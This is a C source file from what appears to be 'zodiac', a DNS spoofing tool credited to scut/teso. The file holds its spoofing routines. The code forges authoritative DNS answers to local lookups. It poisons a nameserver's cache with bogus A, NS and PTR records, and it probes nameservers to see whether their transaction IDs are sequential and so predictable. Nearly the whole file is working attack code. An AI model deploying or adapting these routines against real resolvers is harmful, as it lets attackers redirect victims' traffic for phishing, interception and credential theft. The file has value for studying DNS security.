/* zodiac - advanced dns spoofer
 *
 * by scut / teso
 *
 * spoofing routines
 */

#include <stdlib.h>
#include <string.h>
#include "common.h"
#include "dns.h"
#include "dns-build.h"
#include "dns-spoof.h"
#include "dnsid.h"
#include "dnsq.h"
#include "gui-config.h"
#include "network.h"
#include "output.h"
#include "packet.h"
#include "zodiac.h"


/* spoof_local
 *
 * install a spoof handler that will transparently spoof local requests.
 * the calling function has to launch an extra thread to do this in
 * background *yeah*.
 *
 * used configset variables:
 *
 *   spoof_victim      what local lookupers should be affected
 *   spoof_type        T_A (name to ip) or T_PTR (ip to domain) spoof
 *   spoof_from        ip / host that should be spoofed
 *   spoof_to          wrong resolve for spoof_from
 *   local_dns         nameserver that should be responsible for the domain
 *   local_dns_ip      ip of the responsible nameserver local_dns
 *
 * return in any case
 */

void
spoof_local (configset *cs)
{
	int		n;	/* temporary return value */
	int		desc;	/* filter descriptor */
	struct in_addr	ip_src, ip_dst;	/* ip's (temporary) */
	char		*query;

	/* from any address to the local nameserver
	 */
	ip_src.s_addr = net_resolve (cs->spoof_victim);	/* NULL = any, != NULL, only this client */
	ip_dst.s_addr = net_resolve ("*");		/* can be "*" */

	if (cs->spoof_type == T_PTR) {
		/* convert the ip address to a encoded ptr query within
		 * the .in-addr.arpa domain :)
		 */
		query = dns_build_ptr (cs->spoof_from);
	} else if (cs->spoof_type == T_A) {
		/* domain name is equal to decoded query :)
		 */
		query = xstrdup (cs->spoof_from);
	} else {
		return;
	}

	/* install a virtual dns packet filter
	 */
	desc = dq_filter_install (
		ip_src,			/* dns queries from source IP */
		ip_dst,			/* nameserver or any IP */
		0,			/* source port, we don't care :) */
		53,			/* dns port, we care about queries */
		0, 0, 0,		/* a local spoof, we don't care about the DNS ID's */
		query);			/* query content (only spoof a name / ip) */

	/* installing the handler shouldn't cause any error :-) hopefully
	 */
	if (desc == -1)
		return;

	/* wait indefinitly
	 */
	while (dq_filter_wait (desc, NULL) == 1) {

		char		*ip_src, *ip_dst;
		ip_hdr		*ip;		/* pointer to ip header */
		udp_hdr		*udp;		/* pointer to udp header */
		dns_hdr		*dns;		/* pointer to dns header */
		unsigned char	*dns_data;	/* pointer to dns data part within packet */

		dns_pdata	*pd;		/* dns data part of the packet */
		dq_packet	*catch =	/* catched packet */
			dq_p_get (desc);

		char		*dns_sld;


		/* if we didn't caught the packet (?), abort
		 */

		if (catch == NULL) {
			m_printf (ms, ms->winproc, "[zod] !ERROR! FILTER TRIGGERED, BUT NO PACKET\n");
			goto sp_local_fail;
		}

		m_printf (ms, ms->winproc, "[zod] SPOOF LOCAL GOT PACKET\n");

		/* axe the packet, *yeah*
		 */
		pq_offset (catch->packet, &ip, &udp, &dns, &dns_data);

		/* get spoofed nameserver domain, depending on spoof type =)
		 */
		if (cs->spoof_type == T_A)
			dns_sld = dns_domain (cs->spoof_from);
		else if (cs->spoof_type == T_PTR)
			dns_sld = dns_domain (cs->spoof_to);

		pd = dns_build_new ();
		dns_build_q (pd, cs->spoof_from, cs->spoof_type, C_IN);
		dns_build_rr (pd, cs->spoof_from, cs->spoof_type, C_IN, 86400, cs->spoof_to);
		dns_build_rr (pd, dns_sld, T_NS, C_IN, 86400, cs->local_dns);
		dns_build_rr (pd, cs->local_dns, T_A, C_IN, 86400, cs->local_dns_ip);

		/* fire the packet, yeah :)
		 * flip source/destination ip/port, while doing it :)
		 */
		net_printipa (&ip->ip_dst, &ip_src);
		net_printipa (&ip->ip_src, &ip_dst);

		n = dns_packet_send (ip_src, ip_dst,
			htons (udp->uh_dport), htons (udp->uh_sport), htons (dns->id),
			DF_RESPONSE | DF_AA | DF_RD | DF_RA, 1, 1, 1, 1, pd, 1);

		free (ip_src);
		free (ip_dst);

		/* destroy created and catched packets
		 */
		dns_build_destroy (pd);
		dq_p_free (catch);
	}

sp_local_fail:

	free (query);
	dq_filter_uninstall (desc);

	/* someone ripped us off, let's do him a favor ;-)
	 */
	return;
}


/* spoof_query
 *
 * ask a nameserver `nameserver' for a random host inside our domain
 * `ourdomain'. wait for a question to our local ip from this nameserver
 * for a maximum duration of `timeout' seconds.
 *
 * return 1 if the nameserver responded
 * return 0 if it didn't
 */

int
spoof_query (char *nameserver, char *ourdomain, int timeout)
{
	int		desc;
	int		n = 0;
	dns_pdata	*qpacket;	/* query packet data */
	char		*rnd_aa_host;	/* random authoritative domain */
	char		*local_ip;
	struct in_addr	s_addr,
			d_addr;
	struct timeval	tv;
	struct timeval	*tval = &tv;

	local_ip = net_getlocalip ();

	qpacket = dns_build_new ();
	rnd_aa_host = dns_build_random (ourdomain, 0);
	m_printf (ms, ms->winproc, "%s\n", rnd_aa_host);
	dns_build_q (qpacket, rnd_aa_host, T_A, C_IN);

	s_addr.s_addr = net_resolve (nameserver);
	d_addr.s_addr = net_resolve (local_ip);

	desc = dq_filter_install (s_addr, d_addr, 0, 53, 0, 0, 0, rnd_aa_host);
	free (rnd_aa_host);

	dns_packet_send (local_ip, nameserver, m_random (1024, 50000),
		53, m_random (1, 65535), 0, 1, 0, 0, 0, qpacket, 0);
	dns_build_destroy (qpacket);
	free (local_ip);

	if (timeout == 0) {
		tval = NULL;
	} else {
		tv.tv_usec = 0;
		tv.tv_sec = timeout;
	}

	n = dq_filter_wait (desc, tval);
	dq_filter_uninstall (desc);

	return (n);
}


/* spoof_jizz
 *
 * launch a jizz spoof according to the information in the configset `cs'.
 * the caller function should create a new thread and fire this function in
 * background
 *
 * expect:
 *
 * cs->
 *	nameserver	nameserver to jield cache up
 *	local_domain	domain name, the local dns is authoritative for
 *	local_dns_ip	ip of the nameserver the query will be directed to
 *	spoof_from	domain name to do a A/PTR spoof on
 *	spoof_to	ip to do a PTR/A spoof on
 *
 * return in any case :)
 */


void
spoof_jizz (configset *cs)
{
	u_short		src_prt = m_random (1024, 65535);
	u_short		dns_id = m_random (1, 65535);
	int		desc;
	struct in_addr	s_addr,
			d_addr;
	dns_pdata	*qpacket;	/* query packet data */
	dns_pdata	*apacket;	/* answer packet data */
	char		*rnd_aa_host;	/* random authoritative domain */
	char		*local_ip;

	local_ip = net_getlocalip ();

	/* first construct a query packet
	 */
	qpacket = dns_build_new ();
	rnd_aa_host = strdup (cs->local_domain);
//	rnd_aa_host = dns_build_random (cs->local_domain);
	dns_build_q (qpacket, rnd_aa_host, T_SOA, C_IN);

	/* also construct an answer packet (to save time)
	 */
	apacket = dns_build_new ();
	dns_build_q (apacket, rnd_aa_host, T_SOA, C_IN);
	dns_build_rr (apacket, rnd_aa_host, T_A, C_IN, 120, local_ip);
	dns_build_rr (apacket, cs->spoof_from, T_A, C_IN, 120, cs->spoof_to);
	dns_build_rr (apacket, dns_domain (cs->local_domain), T_A, C_IN, 120,
		local_ip);
	dns_build_rr (apacket, dns_domain (cs->local_domain), T_NS, C_IN, 120,
		dns_domain (cs->local_domain));
	dns_build_rr (apacket, cs->spoof_to, T_PTR, C_IN, 120,
		cs->spoof_from);

	/* install a packet filter
	 */
	s_addr.s_addr = net_resolve ("*");
	d_addr.s_addr = net_resolve (local_ip);

	desc = dq_filter_install (s_addr, d_addr, 0, 53, 0, 0, 0, rnd_aa_host);

	free (rnd_aa_host);
	free (local_ip);

	if (desc == -1)
		return;

	/* launch query packet, then destroy it :)
	 */
	/* spoof here if you want to, i don't want =)
	 */
	dns_packet_send (local_ip, cs->nameserver, src_prt, 53, dns_id, 0, 1, 0, 0, 0, qpacket, 0);
	dns_build_destroy (qpacket);

	/* wait for the packet
	 */
	if (dq_filter_wait (desc, NULL) == 1) {
		char		*ip_src, *ip_dst;
		ip_hdr		*ip;		/* pointer to ip header */
		udp_hdr		*udp;		/* pointer to udp header */
		dns_hdr		*dns;		/* pointer to dns header */
		unsigned char	*dns_data;	/* pointer to dns data part within packet */

		dq_packet	*catch =	/* catched packet */
			dq_p_get (desc);

		if (catch == NULL) {
			m_printf (ms, ms->winproc, "[zod] !ERROR! FILTER TRIGGERED, BUT NO PACKET\n");
			goto sp_local_fail;
		}

		pq_offset (catch->packet, &ip, &udp, &dns, &dns_data);

		net_printipa (&ip->ip_dst, &ip_src);
		net_printipa (&ip->ip_src, &ip_dst);

		/* launch answer packet
		 */
		dns_packet_send (ip_src, ip_dst, htons (udp->uh_dport), htons (udp->uh_sport),
			htons (dns->id), DF_RESPONSE | DF_AA | DF_RD | DF_RA,
			1, 3, 1, 1, apacket, 1);

		free (ip_src);
		free (ip_dst);
		dq_p_free (catch);
	}

	/* uninstall packet filter
	 */

	/* hope, we spoofed, yeah :-)
	 */
sp_local_fail:
	dns_build_destroy (apacket);
}


/* spoof_id
 *
 * launch a dns id spoof in background
 */

void
spoof_dnsid (configset *cs)
{
	unsigned long int	flags;
	u_short			dns_id;	/* the famous B-) */
	struct timeval		tv;

	m_printf (ms, ms->winproc, "[zod] trying to get my hands on the dns id\n");
	if (spoof_query (cs->nameserver, cs->local_domain, 30) == 0 ||
		spoof_query (cs->nameserver, cs->local_domain, 30) == 0) {
		m_printf (ms, ms->winproc, "[zod] dns id spoof failed, nameserver didn't respond\n");
		return;
	}

	dns_id = id_get (&id_rmutex, &id_root, cs->nameserver, &tv, &flags);
	if (dns_id == 0) {
		m_printf (ms, ms->winproc, "[zod] welp, i didn't manage to get my hands on the id :(\n");
		return;
	} else if ((flags & IDF_SEQ) != IDF_SEQ) {
		m_printf (ms, ms->winproc, "[zod] nameserver responded, but has nonsequential id's :((\n");
		return;
	}

	m_printf (ms, ms->winproc, "[zod] sequential id: %hu [age: %d]\n", dns_id, tv.tv_sec);

	return;
}


